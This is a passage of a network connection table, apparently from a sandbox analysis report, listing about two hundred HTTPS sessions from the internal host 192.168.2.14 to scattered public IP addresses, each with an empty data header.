                                                        17340192.168.2.1434858169.157.235.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17341192.168.2.1440948151.47.208.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17342192.168.2.1440476194.160.90.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17343192.168.2.143675275.143.96.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17344192.168.2.1445710119.89.41.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17345192.168.2.1443494201.225.208.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17346192.168.2.144523693.172.248.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17347192.168.2.1458824196.218.18.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17348192.168.2.145574661.24.167.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17349192.168.2.144934267.155.141.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17350192.168.2.1458340139.58.197.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17351192.168.2.144757689.146.211.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17352192.168.2.143602460.91.153.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17353192.168.2.1457738198.35.239.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17354192.168.2.143963054.150.187.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17355192.168.2.1445748156.182.160.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17356192.168.2.1449696142.234.97.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17357192.168.2.1456426143.77.5.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17358192.168.2.14508428.72.224.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17359192.168.2.145955486.169.147.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17360192.168.2.144994644.56.197.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17361192.168.2.145957480.186.78.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17362192.168.2.1437720166.186.240.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17363192.168.2.1460998198.25.176.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17364192.168.2.1443020222.189.59.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17365192.168.2.143979444.22.180.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17366192.168.2.1452704145.234.141.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17367192.168.2.145125053.177.166.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17368192.168.2.1450364110.255.142.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17369192.168.2.1448984142.40.254.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17370192.168.2.144708088.227.100.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17371192.168.2.146050271.81.43.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17372192.168.2.145136250.76.50.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17373192.168.2.143868214.216.177.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17374192.168.2.1458172206.56.154.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17375192.168.2.143619044.177.46.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17376192.168.2.143815435.218.66.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17377192.168.2.1450522219.140.38.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17378192.168.2.1452772175.227.16.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17379192.168.2.144066041.79.23.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17380192.168.2.1449814101.33.18.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17381192.168.2.1457724125.220.26.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17382192.168.2.143430475.171.146.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17383192.168.2.1448902213.202.190.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17384192.168.2.1445184109.8.49.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17385192.168.2.145309276.56.89.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17386192.168.2.144940012.61.137.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17387192.168.2.1451458185.123.39.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17388192.168.2.143389261.253.43.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17389192.168.2.144454625.107.102.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17390192.168.2.145217090.177.154.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17391192.168.2.144230243.159.54.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17392192.168.2.144299687.107.220.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17393192.168.2.144556814.215.182.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17394192.168.2.145676496.94.112.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17395192.168.2.144968025.245.161.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17396192.168.2.143418847.233.61.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17397192.168.2.1456760126.213.33.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17398192.168.2.1447278136.125.80.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17399192.168.2.1442482103.109.150.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17400192.168.2.144372885.166.223.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17401192.168.2.1437238108.222.231.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17402192.168.2.144975667.249.11.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17403192.168.2.145206832.247.129.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17404192.168.2.1460862164.42.64.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17405192.168.2.144437675.204.36.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17406192.168.2.1435152187.116.176.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17407192.168.2.143371884.221.63.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17408192.168.2.1445286206.240.31.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17409192.168.2.143580412.177.108.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17410192.168.2.144157095.41.230.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17411192.168.2.14369541.150.194.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17412192.168.2.145344024.202.139.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17413192.168.2.144572232.177.102.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17414192.168.2.1445700184.159.1.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17415192.168.2.144148812.200.174.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17416192.168.2.1458432218.5.208.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17417192.168.2.143816253.145.71.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17418192.168.2.1439892141.114.58.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17419192.168.2.1436838118.15.56.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17420192.168.2.1440942107.176.196.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17421192.168.2.1459178131.234.138.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17422192.168.2.1452174103.217.39.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17423192.168.2.1444480157.194.204.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17424192.168.2.1443770175.184.100.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17425192.168.2.14484764.61.52.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17426192.168.2.1443796123.172.164.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17427192.168.2.1448926181.165.226.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17428192.168.2.1448050131.98.183.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17429192.168.2.143663846.101.222.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17430192.168.2.1449714109.49.226.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17431192.168.2.145772814.126.60.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17432192.168.2.1434994218.198.193.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17433192.168.2.1439102116.120.49.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17434192.168.2.1435558193.248.23.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17435192.168.2.143733644.26.195.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17436192.168.2.145897213.117.104.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17437192.168.2.1437628200.101.49.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17438192.168.2.145406686.129.195.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17439192.168.2.1451324205.82.232.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17440192.168.2.144333675.164.9.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17441192.168.2.1447574196.19.64.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17442192.168.2.1452994171.46.101.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17443192.168.2.1450870195.101.210.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17444192.168.2.144028449.132.21.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17445192.168.2.143741445.113.190.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17446192.168.2.1449376206.39.161.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17447192.168.2.14442709.182.135.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17448192.168.2.1433416165.220.199.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17449192.168.2.14378448.130.80.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17450192.168.2.145250498.180.51.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17451192.168.2.1454428102.55.84.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17452192.168.2.143464641.105.14.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17453192.168.2.1449960196.15.29.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17454192.168.2.145002070.65.66.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17455192.168.2.1445412141.225.157.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17456192.168.2.1442100142.161.167.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17457192.168.2.1448316140.38.135.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17458192.168.2.1437346147.225.140.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17459192.168.2.145478490.124.158.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17460192.168.2.144720884.180.89.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17461192.168.2.145433484.68.36.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17462192.168.2.144851270.27.202.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17463192.168.2.14424781.100.168.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17464192.168.2.143993240.173.236.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17465192.168.2.1440034212.111.251.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17466192.168.2.1442456156.40.52.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17467192.168.2.144953458.111.83.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17468192.168.2.1437602220.43.45.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17469192.168.2.144002043.23.177.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17470192.168.2.143427065.128.66.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17471192.168.2.1447602115.57.190.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17472192.168.2.1437450111.47.36.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17473192.168.2.1433484161.164.159.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17474192.168.2.1434200177.248.105.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17475192.168.2.1440590207.151.38.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17476192.168.2.1460132130.203.61.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17477192.168.2.1434108162.19.25.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17478192.168.2.1454616154.45.11.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17479192.168.2.1448656213.193.11.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17480192.168.2.1451128109.203.255.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17481192.168.2.143688479.176.120.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17482192.168.2.1457582198.132.253.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17483192.168.2.145326272.192.184.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17484192.168.2.1451958145.18.77.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17485192.168.2.1441688151.85.223.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17486192.168.2.1456952200.148.162.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17487192.168.2.1459944149.247.149.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17488192.168.2.1450534142.21.15.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17489192.168.2.1458898204.94.221.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17490192.168.2.1459306199.77.132.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17491192.168.2.1453650125.243.179.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17492192.168.2.1446516148.123.96.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17493192.168.2.145825490.145.140.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17494192.168.2.1435468193.113.215.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17495192.168.2.1450812219.217.215.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17496192.168.2.1445352206.108.58.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17497192.168.2.145759642.92.86.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17498192.168.2.1444002155.207.102.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17499192.168.2.1452018173.47.135.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17500192.168.2.1449654174.180.148.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17501192.168.2.1433804143.195.18.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17502192.168.2.1449292165.189.77.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17503192.168.2.143842845.101.155.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17504192.168.2.1444874156.39.136.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17505192.168.2.1442002213.124.128.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17506192.168.2.1444906161.100.203.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17507192.168.2.1452840209.44.177.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17508192.168.2.1448634179.89.185.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17509192.168.2.144099863.27.115.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17510192.168.2.1457388143.12.80.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17511192.168.2.145432863.58.98.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17512192.168.2.1457498112.70.144.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17513192.168.2.145594448.179.189.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17514192.168.2.145619060.140.136.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17515192.168.2.144498486.201.195.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17516192.168.2.1435444175.131.72.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17517192.168.2.145565269.144.84.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17518192.168.2.1453500150.51.82.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17519192.168.2.1440106119.6.212.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17520192.168.2.1436964174.168.154.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17521192.168.2.1458686141.219.162.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17522192.168.2.145778647.40.134.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17523192.168.2.1459608183.122.66.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17524192.168.2.145493078.233.30.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17525192.168.2.1436664221.179.204.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17526192.168.2.1446806180.47.24.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17527192.168.2.1445528112.7.117.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17528192.168.2.143734898.149.155.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17529192.168.2.1435814192.122.163.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17530192.168.2.1437050213.139.6.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17531192.168.2.14516021.110.42.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17532192.168.2.143942276.20.77.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17533192.168.2.1440028164.179.176.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17534192.168.2.1436132206.18.132.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17535192.168.2.1449544201.148.104.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17536192.168.2.1437556172.179.97.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17537192.168.2.144438453.154.231.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17538192.168.2.1437060139.151.25.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17539192.168.2.1453404116.170.46.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17540192.168.2.143817893.215.136.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17541192.168.2.144711680.219.55.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17542192.168.2.143627076.76.1.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17543192.168.2.145636069.255.218.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17544192.168.2.145293062.19.240.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17545192.168.2.144217414.184.176.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17546192.168.2.1440956117.172.24.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17547192.168.2.1433320198.21.139.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17548192.168.2.143771083.1.111.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17549192.168.2.145436689.163.154.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17550192.168.2.1442104156.109.126.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17551192.168.2.1441748213.98.127.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17552192.168.2.144499232.56.105.49443
